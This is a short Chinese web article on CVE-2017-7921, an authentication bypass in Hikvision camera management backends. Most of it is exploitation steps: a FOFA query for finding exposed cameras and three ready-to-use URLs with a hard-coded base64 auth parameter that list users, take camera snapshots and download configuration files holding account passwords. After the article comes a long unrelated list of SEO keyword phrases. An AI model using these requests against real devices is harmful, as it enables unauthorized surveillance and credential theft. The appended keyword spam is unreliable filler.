如何进行CVE-2017-7921的漏洞分析
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,如何进行CVE-2017-7921的漏洞分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。一、漏洞概述:杭州海康威视系统技术有限公司
千家信息网最后更新 2025年01月20日如何进行CVE-2017-7921的漏洞分析
如何进行CVE-2017-7921的漏洞分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
一、漏洞概述:
杭州海康威视系统技术有限公司摄像头管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。
fofa网址:fofa.so
fofa搜索:app="HIKVISION-视频监控"
二、漏洞利用:
1、利用路径:
http://your-ip/Security/users?auth=YWRtaW46MTEK
YWRtaW46MTEKadmin:11的base64编码
检索所有用户及其角色的列表。
2、利用路径:
http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK
获取监控快照,不进行身份验证。
3、利用路径:
http://your-ip/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头配置账号密码文件。
关于如何进行CVE-2017-7921的漏洞分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。
漏洞
分析
路径
问题
监控
漏洞分析
摄像头
文件
更多
用户
帮助
摄像
检索
解答
配置
易行
简单易行
公司
内容
后台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网易服务器生存现状
城市静态poi数据库
牡丹江招聘软件开发
关系数据库查询处理方法
管理员怎么删除用户数据库
网络技术 网络强国
淘宝网的数据库连接数
计算机应用网络技术专业课程
未来软件开发趋势
小米11Pro谷歌服务器通信
安全性高的服务器
亿联网络技术分析
cortex软件开发公司
图书馆网络安全问题
tcag数据库
江苏多功能软件开发方法
饥荒专用服务器怎么加本地mod
军工网络安全概念股
开展网络安全监测工作
学校与网络技术公司签订合同
开发软件什么情况下需要服务器
东营网络技术有限公司电话
淮南门店管理软件开发要多少钱
国际服服务器1.17.10推荐
拼客学院网络安全网盘资源
重庆交易软件开发中心
工业控制系统网络安全预案
剑三服务器搬迁
多线程sybase数据库
成都电脑软件开发哪家实惠